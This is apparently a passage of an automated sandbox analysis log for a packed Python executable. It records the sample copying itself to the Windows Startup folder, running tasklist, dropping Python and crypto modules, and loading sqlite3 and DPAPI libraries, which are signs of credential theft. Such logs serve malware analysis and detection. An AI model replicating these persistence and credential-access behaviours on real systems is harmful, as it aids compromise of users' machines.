            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: python3.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: python3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: HyZh4pn0RF.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: HyZh4pn0RF.exeStatic file information: File size 13884221 > 1048576
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: HyZh4pn0RF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: HyZh4pn0RF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1834045763.00007FFBAAFF4000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAA99000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843680018.00007FFBBCD53000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1833413719.00007FFBAAB31000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842850909.00007FFBBC153000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1843366024.00007FFBBC261000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1839349243.00007FFBB4C47000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841121010.00007FFBBAE72000.00000002.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1840833630.00007FFBB7FB8000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838082520.00007FFBAB6F2000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1842565303.00007FFBBBE93000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841899584.00007FFBBB37C000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.13 30 Jan 20243.0.13built on: Mon Feb 5 17:39:09 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1841637269.00007FFBBAF59000.00000002.00000001.01000000.0000000B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1843136590.00007FFBBC244000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838434179.00007FFBAB794000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HyZh4pn0RF.exe, 00000002.00000002.1838782626.00007FFBAB7ED000.00000002.00000001.01000000.0000000F.sdmp
            Source: HyZh4pn0RF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: HyZh4pn0RF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: HyZh4pn0RF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: HyZh4pn0RF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: HyZh4pn0RF.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: HyZh4pn0RF.exeStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
            Source: python312.dll.0.drStatic PE information: section name: PyRuntim
            Source: HyZh4pn0RF.exe.2.drStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.9.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.9.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.9.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.9.drStatic PE information: section name: .00cfg
            Source: python312.dll.9.drStatic PE information: section name: PyRuntim
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4C5004 push rsp; retf 0_2_00007FF78F4C5005
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAA5C161E push rdx; iretd 2_2_00007FFBAA5C1621
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7C7020 push rbp; retf 2_2_00007FFBAB7C7023
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7C7038 push rsp; retf 2_2_00007FFBAB7C703B
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7C7030 push rbp; retf 2_2_00007FFBAB7C704B
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF769365004 push rsp; retf 9_2_00007FF769365005
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2F161E push rdx; iretd 10_2_00007FFBAA2F1621
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB844021 push rcx; ret 10_2_00007FFBBB844022
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
